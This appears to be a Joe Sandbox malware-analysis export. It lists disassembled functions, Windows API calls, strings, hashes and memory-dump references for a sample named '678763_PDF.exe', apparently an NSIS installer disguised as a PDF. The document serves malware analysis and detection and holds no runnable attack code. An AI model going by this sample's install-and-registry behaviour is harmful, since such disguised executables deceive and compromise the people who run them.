Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32 ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000023,00000011,00000002), ref: 004024DA
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,00000011,00000002), ref: 0040251A
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,00000011,00000002), ref: 00402602

Strings

C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp, xrefs: 004024CB, 004024D9, 004024F0, 00402504, 0040250F

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp
API String ID: 2655323295-3377814068
Opcode ID: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
Opcode Fuzzy Hash: a41cb6f13485af1a9ec10d2b5ae98035f7e48eaeb505393f7ac1ad9e88c8f9fe
Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58

Function 00405F2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405F87
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2E
C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp, xrefs: 00405F34, 00405F39, 00405F3F, 00405F80, 00405F86, 00405F8E, 00405F96

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp
API String ID: 3248276644-4036822723
Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE

Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405EDF
CharNextW.USER32(00000000), ref: 00405EE4
CharNextW.USER32(00000000), ref: 00405EFC

Strings

C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp, xrefs: 00405ED2

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp
API String ID: 3213498283-3377814068
Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA

Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD

Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll), ref: 0040269A

Strings

C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll, xrefs: 0040265E, 00402683, 00402695, 004026E1
C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp, xrefs: 00402688

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp$C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp\nsExec.dll
API String ID: 1659193697-4043438737
Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
